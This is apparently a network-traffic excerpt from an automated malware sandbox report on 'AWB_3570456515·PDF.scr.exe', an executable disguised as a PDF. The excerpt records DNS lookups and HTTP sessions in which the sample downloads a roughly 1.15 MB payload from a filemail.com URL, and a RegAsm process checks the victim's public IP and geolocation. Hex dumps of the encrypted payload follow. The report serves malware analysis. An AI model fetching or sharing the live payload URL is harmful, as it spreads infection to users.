                                                                              Feb 21, 2025 08:57:32.768978119 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.768982887 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.769098997 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.769160986 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.769165039 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.769231081 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.769293070 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.769296885 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.771439075 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.792310953 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.792403936 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.792411089 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.792462111 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.792488098 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.792551994 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.792557001 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.836517096 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.854624987 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.854717016 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.854739904 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.854892969 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.854947090 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.854953051 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.855119944 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.855185986 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.855190992 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.855377913 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.855446100 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.855451107 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.855612040 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.855678082 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.855684042 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.855829000 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.855894089 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.855899096 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.856043100 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.856108904 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.856113911 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.856254101 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.856314898 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.856319904 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.856540918 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.856610060 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.856615067 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.856915951 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.856990099 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.856995106 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.857160091 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.857223988 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.857228994 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.857300997 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.857361078 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.857366085 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.857711077 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.857778072 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.857783079 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.878884077 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.878951073 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.878964901 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.879115105 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.879189014 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.879194975 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.879302979 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.879358053 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.879364014 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.879511118 CET4434970523.237.188.42192.168.2.5
                                                                              Feb 21, 2025 08:57:32.879580975 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:57:32.892976046 CET49705443192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:58:22.431898117 CET4992980192.168.2.5158.101.44.242
                                                                              Feb 21, 2025 08:58:22.438095093 CET8049929158.101.44.242192.168.2.5
                                                                              Feb 21, 2025 08:58:22.438195944 CET4992980192.168.2.5158.101.44.242
                                                                              Feb 21, 2025 08:58:22.438530922 CET4992980192.168.2.5158.101.44.242
                                                                              Feb 21, 2025 08:58:22.444931984 CET8049929158.101.44.242192.168.2.5
                                                                              Feb 21, 2025 08:58:23.022630930 CET8049929158.101.44.242192.168.2.5
                                                                              Feb 21, 2025 08:58:23.070751905 CET4992980192.168.2.5158.101.44.242
                                                                              Feb 21, 2025 08:58:23.248827934 CET4992980192.168.2.5158.101.44.242
                                                                              Feb 21, 2025 08:58:23.253994942 CET8049929158.101.44.242192.168.2.5
                                                                              Feb 21, 2025 08:58:23.404459953 CET8049929158.101.44.242192.168.2.5
                                                                              Feb 21, 2025 08:58:23.438093901 CET49935443192.168.2.5104.21.16.1
                                                                              Feb 21, 2025 08:58:23.438153028 CET44349935104.21.16.1192.168.2.5
                                                                              Feb 21, 2025 08:58:23.438297987 CET49935443192.168.2.5104.21.16.1
                                                                              Feb 21, 2025 08:58:23.443753004 CET49935443192.168.2.5104.21.16.1
                                                                              Feb 21, 2025 08:58:23.443792105 CET44349935104.21.16.1192.168.2.5
                                                                              Feb 21, 2025 08:58:23.445597887 CET4992980192.168.2.5158.101.44.242
                                                                              Feb 21, 2025 08:58:23.906461000 CET44349935104.21.16.1192.168.2.5
                                                                              Feb 21, 2025 08:58:23.906543016 CET49935443192.168.2.5104.21.16.1
                                                                              Feb 21, 2025 08:58:23.911542892 CET49935443192.168.2.5104.21.16.1
                                                                              Feb 21, 2025 08:58:23.911561966 CET44349935104.21.16.1192.168.2.5
                                                                              Feb 21, 2025 08:58:23.911815882 CET44349935104.21.16.1192.168.2.5
                                                                              Feb 21, 2025 08:58:23.955221891 CET49935443192.168.2.5104.21.16.1
                                                                              Feb 21, 2025 08:58:23.995337009 CET44349935104.21.16.1192.168.2.5
                                                                              Feb 21, 2025 08:58:24.071240902 CET44349935104.21.16.1192.168.2.5
                                                                              Feb 21, 2025 08:58:24.071297884 CET44349935104.21.16.1192.168.2.5
                                                                              Feb 21, 2025 08:58:24.071356058 CET49935443192.168.2.5104.21.16.1
                                                                              Feb 21, 2025 08:58:24.079715967 CET49935443192.168.2.5104.21.16.1
                                                                              Feb 21, 2025 08:58:24.819256067 CET4970480192.168.2.523.237.188.42
                                                                              Feb 21, 2025 08:59:28.404409885 CET8049929158.101.44.242192.168.2.5
                                                                              Feb 21, 2025 08:59:28.404556036 CET4992980192.168.2.5158.101.44.242
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 21, 2025 08:57:30.316950083 CET5151453192.168.2.51.1.1.1
                                                                              Feb 21, 2025 08:57:30.330060959 CET53515141.1.1.1192.168.2.5
                                                                              Feb 21, 2025 08:58:22.418458939 CET5674153192.168.2.51.1.1.1
                                                                              Feb 21, 2025 08:58:22.425817013 CET53567411.1.1.1192.168.2.5
                                                                              Feb 21, 2025 08:58:23.411231041 CET6185253192.168.2.51.1.1.1
                                                                              Feb 21, 2025 08:58:23.437275887 CET53618521.1.1.1192.168.2.5
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Feb 21, 2025 08:57:30.316950083 CET192.168.2.51.1.1.10xd2cfStandard query (0)1009.filemail.comA (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:22.418458939 CET192.168.2.51.1.1.10x2cc0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:23.411231041 CET192.168.2.51.1.1.10xd55eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Feb 21, 2025 08:57:30.330060959 CET1.1.1.1192.168.2.50xd2cfNo error (0)1009.filemail.comip.1009.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                              Feb 21, 2025 08:57:30.330060959 CET1.1.1.1192.168.2.50xd2cfNo error (0)ip.1009.filemail.com23.237.188.42A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:22.425817013 CET1.1.1.1192.168.2.50x2cc0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:22.425817013 CET1.1.1.1192.168.2.50x2cc0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:22.425817013 CET1.1.1.1192.168.2.50x2cc0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:22.425817013 CET1.1.1.1192.168.2.50x2cc0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:22.425817013 CET1.1.1.1192.168.2.50x2cc0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:22.425817013 CET1.1.1.1192.168.2.50x2cc0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:23.437275887 CET1.1.1.1192.168.2.50xd55eNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:23.437275887 CET1.1.1.1192.168.2.50xd55eNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:23.437275887 CET1.1.1.1192.168.2.50xd55eNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:23.437275887 CET1.1.1.1192.168.2.50xd55eNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:23.437275887 CET1.1.1.1192.168.2.50xd55eNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:23.437275887 CET1.1.1.1192.168.2.50xd55eNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                              Feb 21, 2025 08:58:23.437275887 CET1.1.1.1192.168.2.50xd55eNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                              • 1009.filemail.com
                                                                              • reallyfreegeoip.org
                                                                              • checkip.dyndns.org
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.54970423.237.188.42807260C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2025 08:57:30.365689993 CET187OUTGET /api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb95 HTTP/1.1
                                                                              Host: 1009.filemail.com
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2025 08:57:30.961100101 CET591INHTTP/1.1 301 Moved Permanently
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Location: https://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb95
                                                                              Server: Microsoft-IIS/10.0
                                                                              Date: Fri, 21 Feb 2025 07:57:30 GMT
                                                                              Content-Length: 273
                                                                              Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 31 30 30 39 2e 66 69 6c 65 6d 61 69 6c 2e 63 6f 6d 2f 61 70 69 2f 66 69 6c 65 2f 67 65 74 3f 66 69 6c 65 6b 65 79 3d 6e 57 32 41 70 34 50 66 7a 35 70 4a 51 71 66 52 62 50 4c 45 57 78 74 68 2d 45 43 37 44 34 7a 37 41 4a 6e 6b 52 67 69 46 61 4c 74 4b 51 79 6a 78 72 31 6a 30 77 4c 4a 58 76 30 4d 26 61 6d 70 3b 70 6b 5f 76 69 64 3d 38 65 32 61 65 63 38 66 30 36 35 64 61 63 39 39 31 37 34 30 30 35 36 36 31 36 63 31 65 62 39 35 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                              Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&amp;pk_vid=8e2aec8f065dac991740056616c1eb95">here</a></body>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549929158.101.44.242807832C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Feb 21, 2025 08:58:22.438530922 CET151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2025 08:58:23.022630930 CET321INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:58:22 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: e8e8142608bb14916f55880482123179
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                              Feb 21, 2025 08:58:23.248827934 CET127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Feb 21, 2025 08:58:23.404459953 CET321INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:58:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 104
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 3fe209ceddbfc68d7b01354bc08c1912
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.54970523.237.188.424437260C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-02-21 07:57:31 UTC187OUTGET /api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb95 HTTP/1.1
                                                                              Host: 1009.filemail.com
                                                                              Connection: Keep-Alive
                                                                              2025-02-21 07:57:31 UTC334INHTTP/1.1 200 OK
                                                                              Content-Length: 1150472
                                                                              Content-Type: application/octet-stream
                                                                              Last-Modified: Thu, 20 Feb 2025 13:03:17 GMT
                                                                              Accept-Ranges: bytes
                                                                              ETag: d5a89e1a52aeccdb6338c118c81b9290
                                                                              X-Transfer-ID: ntkuashuldrynzp
                                                                              Content-Disposition: attachment; filename=Ibpbhe.vdf
                                                                              Date: Fri, 21 Feb 2025 07:57:31 GMT
                                                                              Connection: close
                                                                              2025-02-21 07:57:31 UTC800INData Raw: ab 53 76 37 9a 33 31 d2 b5 00 86 60 77 95 5b 2d e8 4d f4 a9 32 62 d5 78 7d 07 9d bb c5 1a e4 77 88 16 24 4f b8 3f b6 d4 6d 26 32 cf 7e 99 50 08 eb d6 f1 7c 6a c7 4b fb 37 52 6c b3 70 0b 99 28 91 1a c1 52 12 10 b9 9a 15 5c 33 e3 a9 c9 66 31 64 75 6b 3f f9 ee 1a 5b fc 25 7e cf b1 c6 bd 15 52 74 25 1a 09 df fb fe 8b 8d 62 6d 28 7a b4 a9 17 a8 07 0c 46 c4 1c ea 25 d1 45 ff 2d b7 02 1e a4 5a 24 59 6c 42 94 e9 4d 9e 1e d5 6f fc 4b 87 eb 41 b3 cf e5 d0 2e 86 ff c6 1a a8 01 a2 dd be 02 e6 89 35 e2 57 7a f2 f2 59 9e 74 d9 d1 a4 86 78 ba 90 2d 91 34 3d 09 f9 d2 6c 0c 53 2c 61 94 27 8c 2a 92 8f 8f 3a fc 66 8f 4d 8e 8f 2a 03 01 4b 22 a2 f5 f6 36 03 f4 22 0e 82 e3 44 73 a9 b7 4f 59 ad bd d8 0a a4 83 4f 24 d1 a0 71 34 31 b0 21 24 1d 0e 01 61 b9 e6 96 be 1d 23 bd d8 01
                                                                              Data Ascii: Sv731`w[-M2bx}w$O?m&2~P|jK7Rlp(R\3f1duk?[%~Rt%bm(zF%E-Z$YlBMoKA.5WzYtx-4=lS,a'*:fM*K"6"DsOYO$q41!$a#
                                                                              2025-02-21 07:57:31 UTC8192INData Raw: a0 5a a2 c5 40 ba d0 18 ff 9a 9a 17 bd fc 1d ae c6 ae b0 21 b7 28 8f eb ec d9 ba 88 8a 5e d6 f3 23 ff 2e 0d 95 95 d9 5a a1 3a a5 41 be 86 98 5f 9b 64 a5 62 f3 45 25 68 33 86 54 68 fc 8c 37 a1 df fb e1 14 5e ee 25 16 25 88 f0 f8 71 7c be 31 e0 ca c7 58 3b ec bd b0 5d 4b d0 6a b6 5a 96 51 31 ac c4 c1 ff d5 a0 06 b7 0f 73 d8 aa 93 d1 29 86 a6 0f 83 86 9c 73 6d 98 31 a8 bc b0 71 27 5b d7 9c e2 e5 72 1f c4 26 64 0d f9 21 a4 a3 ba f7 36 ff 81 31 e7 f6 8a 99 fe d9 55 f0 6d fa 61 85 4f 45 89 58 e0 c1 02 3d 36 8a ec 72 1b d1 a2 4e 47 96 21 e0 59 23 d6 34 5a 0d cb 30 30 17 d8 66 58 5b 8e 44 c1 05 20 ec d9 de b4 b8 cc ab 85 e6 82 49 38 fc c5 ef 1c 8d ec 1b 6f 9f 1b 19 e3 ed 15 7a f8 e5 7e 99 c4 f6 1e 91 da 01 fb f9 49 32 ed c1 8e 81 4a 93 47 42 c7 61 08 6d ad 30 31
                                                                              Data Ascii: Z@!(^#.Z:A_dbE%h3Th7^%%q|1X;]KjZQ1s)sm1q'[r&d!61UmaOEX=6rNG!Y#4Z00fX[D I8oz~I2JGBam01
                                                                              2025-02-21 07:57:31 UTC8192INData Raw: d6 c1 88 9e 56 f6 7b 11 e0 8d 43 b9 0a 59 d8 81 93 55 74 63 6f 66 7a 81 0a ef 39 31 2e cb 85 9f bb 8b 07 37 cb 20 aa 08 cf bb 8d 32 47 3e 43 26 a1 8e 44 fa e4 62 40 a6 71 c7 0a e1 36 90 5d f7 e6 00 4c a1 a2 6b 7a a3 df fe ce b1 b5 b0 73 69 b1 40 0b 8f d7 39 19 e9 0c 2f 3c be 53 73 cd 40 c0 96 5b fa fe 05 2c 58 e2 56 16 7e 96 f4 51 61 42 ad 99 64 71 a1 e4 67 c0 5d 22 b2 28 e4 c9 81 cd eb 76 e6 4f 73 dd 90 2c c6 3e ce 9a b5 f6 88 84 d8 18 7c e1 4e 74 d2 1e f2 ea 3b 6f 35 3d 50 0f 64 d7 eb df e4 e8 02 07 06 a9 86 53 9f de f6 b6 5f e9 a6 dc 36 41 f1 f5 82 86 3c 94 b3 ec 60 18 77 b4 83 e4 63 fb 7e b2 67 75 fc b3 8c da 58 04 b5 29 95 b7 39 de 68 27 d4 1c 6c d5 16 84 6e 17 cf 54 3e cc 4f 6d 7a ad 1f e6 5d b6 cd 3d b5 25 4d 74 c1 92 56 a8 aa 10 f9 b9 c9 5b 33 43
                                                                              Data Ascii: V{CYUtcofz91.7 2G>C&Db@q6]Lkzsi@9/<Ss@[,XV~QaBdqg]"(vOs,>|Nt;o5=PdS_6A<`wc~guX)9h'lnT>Omz]=%MtV[3C
                                                                              2025-02-21 07:57:32 UTC8192INData Raw: a3 a9 15 c5 1a 02 8d 67 64 4a e9 61 ba 5c bc 1e 7d 9d c9 56 a6 f3 f1 67 15 9b 9e 14 63 d7 ef 8b 73 71 f8 dc 93 30 35 58 90 9c 2c 45 62 98 84 35 b4 76 aa b1 6b b9 16 17 d3 e1 46 54 3e 6a 2e c6 71 e2 5e be 85 10 8e fd 6c 5e 2f cf b0 2c 20 57 93 9d 77 7a a4 b0 83 7e 85 d5 8d 07 d9 52 c3 38 6f 34 2f 40 8f eb 25 1c c4 20 ad 47 99 26 bf 01 5a 58 f9 10 66 93 d9 f1 30 95 8a 37 f7 db ea 70 ae 72 ae 48 53 9c fa 3a cf 0c a5 a1 89 f6 bb 9d 90 19 84 30 5b 17 ea e0 c8 bd b1 4b fd 23 b5 a6 4e 17 5b 21 4f 61 03 10 8a 46 92 a2 63 6f 32 c2 4a 49 3d 6f cb 11 d3 21 4e 32 ad 18 94 37 e5 1a b4 23 1c d9 b7 7b a1 2b c2 a1 b3 70 48 ee 03 46 58 9d 4a 79 8d e1 55 d4 3e bd 5e 80 59 8f b7 d5 a1 93 3c 05 80 68 5d fc 38 5d d0 b6 d7 69 a8 07 20 69 da 4c 69 8a c8 7d f8 cf e5 15 7b 0f de
                                                                              Data Ascii: gdJa\}Vgcsq05X,Eb5vkFT>j.q^l^/, Wwz~R8o4/@% G&ZXf07prHS:0[K#N[!OaFco2JI=o!N27#{+pHFXJyU>^Y<h]8]i iLi}{
                                                                              2025-02-21 07:57:32 UTC8192INData Raw: 4d 8b 7e 58 ad f4 0e e9 e3 c6 02 7a 29 d3 9c c1 12 3a ff 25 51 da 56 56 14 d8 a4 3d c8 1a 73 67 33 b7 54 1f 2d a3 0f 6d 26 a8 16 5d 52 4d e1 21 e2 f1 92 8e 24 a6 90 79 eb d1 e9 b9 6a a3 89 50 ca 97 38 59 15 61 38 27 ea ae 9f e4 07 f9 a6 9e 26 04 15 43 cf 90 a2 53 e0 02 2f 44 21 ff 6a eb 2e 1e f4 e1 46 f4 47 74 99 d9 3f a0 74 63 03 73 e1 6c 65 18 00 de f3 12 d8 25 a3 4a 60 83 2f ab 77 aa e5 95 cb ba e0 d9 ca 77 ef ef f5 8d 19 84 db 87 e2 01 9c 82 7b 0a 5b 5b 3a 99 78 cf 93 98 ef fc a8 11 fb 54 6f 09 17 07 1d 09 50 77 e5 04 9b 81 28 25 74 55 a0 1d 4b 9f 14 f2 41 d5 30 eb d7 73 e5 b8 b4 9d 73 fc e7 4d e7 a7 ed f2 f0 7c 93 d2 e5 c8 f7 99 b2 eb e1 eb ee 96 ad 17 66 62 ba 77 76 7b 20 32 14 9e aa e5 ad 65 ed 49 66 fa 58 83 0b 95 f7 e9 aa ca 57 4f 62 1d eb c4 83
                                                                              Data Ascii: M~Xz):%QVV=sg3T-m&]RM!$yjP8Ya8'&CS/D!j.FGt?tcsle%J`/ww{[[:xToPw(%tUKA0ssM|fbwv{ 2eIfXWOb
                                                                              2025-02-21 07:57:32 UTC8192INData Raw: 53 6e 92 fd 51 8d d3 d3 9f 98 2f ce c0 8e c1 c7 87 19 49 c3 8b ac 73 4d 08 f0 be 55 b6 aa d6 db 65 28 fe 6a 43 80 c2 e1 47 b0 9f 6f cf 77 f7 1e 15 97 31 fe 31 ed e1 5e 7a 68 86 53 30 de 20 ea b0 d1 f8 82 f3 49 bf 2f 0b 2f cf 69 6a f3 81 1a 84 f3 9c 3d d6 da 40 c0 d1 f3 51 d2 60 bd de e1 6f 85 6b 46 0e 98 cf 34 77 97 a1 87 a1 0c 63 b6 f6 e3 30 14 fe d8 87 ce 05 4c a4 de 31 2b b5 42 20 6f 2b 5e 2b 1f 54 bf f8 31 32 91 ea 7b d3 4c a5 d6 4f e4 cf 81 09 05 6d 30 c7 44 97 71 95 08 89 0a 9c f9 81 ac 47 fa 04 4a ec d2 13 2f c3 3a 6f 7a 2e 6c 19 5b 52 97 c9 87 bf 93 c5 ce 10 53 ed 1d 07 44 9b ed 19 8f 46 6a 9b 2e 62 a9 20 0c be 69 9d ea fe fe d2 6f 85 83 0e b1 93 2c e3 ff 44 e2 e3 4e 40 09 e9 eb bc c7 dd e0 35 83 a2 89 c0 d6 00 22 e1 b2 bf 19 bb eb 49 bd 0e 58 db
                                                                              Data Ascii: SnQ/IsMUe(jCGow11^zhS0 I//ij=@Q`okF4wc0L1+B o+^+T12{LOm0DqGJ/:oz.l[RSDFj.b io,DN@5"IX
                                                                              2025-02-21 07:57:32 UTC8192INData Raw: a7 88 17 ec 12 42 a8 20 bb 6a f9 7c 75 8c 47 a4 7d 77 99 c5 0e ab 87 8a 1c a0 84 ef 12 68 f9 7c bb c6 5e c6 e4 d7 b4 5c a3 0b 67 5d ef 5e 8f 74 f9 79 76 17 92 30 29 b4 ed 1c 24 28 ec 81 1c fe 55 a6 fb 25 af ae 78 f4 aa bf 71 7c 0b f7 e5 e1 00 eb f8 45 c6 96 ac 4e e6 18 47 6a ae 91 57 17 e0 39 b6 5d e0 3c b9 4d 92 0f 6f 0b 07 7f 9c 93 8c 39 8c 99 1e d5 a9 3b f0 e2 97 31 15 d6 55 d6 58 f9 72 e6 e7 e0 af ce 0d 3e 6a 5a 99 ac 68 99 f6 59 c1 fd a0 dc 09 e7 5a e7 7f a7 72 cf a8 54 d9 a0 d4 14 5c e4 5e 95 81 c0 49 e5 5d fe 7e 62 84 2c 39 eb d1 7b d7 03 c6 43 e6 23 2d ca cd 3a 3a 66 1f 20 d9 49 93 7c 51 f5 21 98 ba 7e 09 fc 75 c0 3f a3 00 6d 91 e5 b6 47 ff cd 94 9f e3 09 17 c2 42 13 92 b8 1f dd 77 20 5b 9b 3d 8d 80 e3 07 36 b5 ea 51 d6 2c 65 79 6f ef c6 26 84 d4
                                                                              Data Ascii: B j|uG}wh|^\g]^tyv0)$(U%xq|ENGjW9]<Mo9;1UXr>jZhYZrT\^I]~b,9{C#-::f I|Q!~u?mGBw [=6Q,eyo&
